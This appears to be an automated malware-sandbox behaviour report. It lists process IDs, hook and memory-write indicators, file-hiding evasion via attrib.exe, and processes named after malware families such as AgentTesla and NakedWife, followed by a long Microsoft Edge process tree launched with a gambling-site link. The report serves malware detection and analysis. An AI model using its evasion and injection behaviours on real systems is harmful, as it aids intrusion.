3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe
3212	msedge.exe

Suspicious use of SetWindowsHookEx 15 IoCs

Processes:

msedge.exeAnyDesk.exeAgentTesla.exeiexplore.exeIEXPLORE.EXEPikachu.exeNakedWife.exeProlin.exeOpenWith.exeMaldal.a.exeMari.exe

pid	process
3212	msedge.exe
3212	msedge.exe
2928	AnyDesk.exe
2928	AnyDesk.exe
660	AgentTesla.exe
1836	iexplore.exe
1836	iexplore.exe
5256	IEXPLORE.EXE
5256	IEXPLORE.EXE
5956	Pikachu.exe
6080	NakedWife.exe
3672	Prolin.exe
4840	OpenWith.exe
4380	Maldal.a.exe
2280	Mari.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 3212 wrote to memory of 3644	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 3644	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1800	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1712	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1712	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe
PID 3212 wrote to memory of 1332	3212	msedge.exe	msedge.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

15532 attrib.exe
17924 attrib.exe
8436 attrib.exe

pid	process
15532	attrib.exe
17924	attrib.exe
8436	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bloxflip.com/a/kriszti
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb150c46f8,0x7ffb150c4708,0x7ffb150c4718
  2⤵
  PID:3644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
  2⤵
  PID:1800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
  2⤵
  PID:1332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:3748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:1960
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 /prefetch:8
  2⤵
  PID:2156
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
  2⤵
  PID:3752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
  2⤵
  PID:808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
  2⤵
  PID:2992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2596 /prefetch:1
  2⤵
  PID:4088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:1676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1284 /prefetch:1
  2⤵
  PID:3296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
  2⤵
  PID:112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
  2⤵
  PID:2176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
  2⤵
  PID:972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
  2⤵
  PID:4108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
  2⤵
  PID:1804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5268 /prefetch:8
  2⤵
  PID:4524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:1
  2⤵
  PID:5104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6968 /prefetch:1
  2⤵
  PID:912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6388 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6728 /prefetch:1
  2⤵
  PID:1852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7084 /prefetch:1
  2⤵
  PID:3872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:1
  2⤵
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
  2⤵
  PID:1672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
  2⤵
  PID:3092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
  2⤵
  PID:2248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6244 /prefetch:8
  2⤵
  PID:1484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:2328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:1
  2⤵
  PID:1680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1
  2⤵
  PID:1244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
  2⤵
  PID:1528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
  2⤵
  PID:2932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:1
  2⤵
  PID:4616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1308 /prefetch:1
  2⤵
  PID:3468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2100 /prefetch:1
  2⤵
  PID:1016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:1
  2⤵
  PID:2696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1
  2⤵
  PID:2976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1
  2⤵
  PID:4456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7372 /prefetch:1
  2⤵
  PID:1496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
  2⤵
  PID:2904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7212 /prefetch:1
  2⤵
  PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7536 /prefetch:8
  2⤵
  PID:4180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7480 /prefetch:1
  2⤵
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5300 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3820
